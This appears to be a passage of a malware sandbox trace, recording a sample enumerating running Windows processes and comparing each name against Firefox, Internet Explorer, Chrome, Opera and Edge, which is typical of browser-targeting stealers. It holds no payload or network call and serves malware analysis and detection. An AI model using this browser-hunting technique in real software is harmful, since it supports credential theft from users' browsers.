[0161.397] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0161.398] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0161.398] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.398] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.398] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0161.398] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0161.398] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0161.398] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0161.398] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.398] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0161.399] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0161.399] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0161.399] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0161.399] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0161.399] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.399] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0161.399] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0161.399] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0161.399] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0161.399] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0161.399] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.399] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0161.400] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0161.400] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0161.400] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0161.400] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0161.400] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.400] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0161.400] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0161.401] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0161.401] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0161.401] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0161.401] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0161.401] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0161.401] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0161.401] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0161.401] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0161.401] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.401] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0161.402] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0161.402] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0161.402] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0161.402] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0161.402] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.402] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.402] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.402] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.402] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.402] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.402] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.403] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.403] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.403] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.403] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.403] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.403] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.404] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.404] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.405] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.405] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.405] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.405] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.405] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0161.405] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0161.405] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0161.405] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0161.405] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0161.405] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.405] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.406] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.406] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.406] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.406] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.406] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.406] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.407] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.407] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.407] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.407] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.407] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0161.407] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0161.407] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0161.407] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0161.407] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0161.407] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.407] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0161.408] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0161.408] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0161.408] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0161.408] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0161.408] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.408] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0161.409] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0161.409] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0161.409] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0161.409] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0161.409] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0161.409] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0161.409] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0161.409] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0161.409] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0161.409] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.409] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0161.410] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0161.410] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0161.410] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0161.410] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0161.410] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.410] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0161.410] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0161.410] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0161.410] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0161.410] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0161.411] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0161.411] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0161.411] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0161.411] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0161.411] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0161.411] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.411] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0161.412] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0161.412] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0161.412] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0161.412] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0161.412] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0161.412] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0161.412] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0161.412] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0161.412] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0161.412] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.412] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0161.413] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0161.413] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0161.413] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0161.413] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0161.413] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.413] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0161.413] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0161.413] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0161.413] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0161.414] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0161.414] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0161.414] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0161.414] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0161.414] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0161.414] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0161.414] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.414] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0161.415] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0161.415] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0161.415] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0161.415] lstrcmpiA (lpString1="seeker.exe", lpString2="opera.exe") returned 1 [0161.415] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0161.415] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0161.415] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0161.415] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0161.415] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="opera.exe") returned -1 [0161.415] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.415] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0161.416] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0161.416] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0161.416] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0161.416] lstrcmpiA (lpString1="birth bean.exe", lpString2="opera.exe") returned -1 [0161.416] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.416] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0161.417] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0161.417] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0161.417] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0161.417] lstrcmpiA (lpString1="ruby.exe", lpString2="opera.exe") returned 1 [0161.417] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0161.417] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0161.417] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0161.417] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0161.417] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="opera.exe") returned 1 [0161.417] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.417] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0161.418] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0161.418] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0161.418] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0161.418] lstrcmpiA (lpString1="smith.exe", lpString2="opera.exe") returned 1 [0161.418] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.418] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0161.418] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0161.418] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0161.418] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0161.418] lstrcmpiA (lpString1="spicedespite.exe", lpString2="opera.exe") returned 1 [0161.419] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0161.419] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0161.419] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0161.419] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0161.419] lstrcmpiA (lpString1="wooden.exe", lpString2="opera.exe") returned 1 [0161.419] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0161.419] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0161.420] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0161.420] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0161.420] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0161.420] lstrcmpiA (lpString1="dallasr.exe", lpString2="opera.exe") returned -1 [0161.420] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0161.420] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 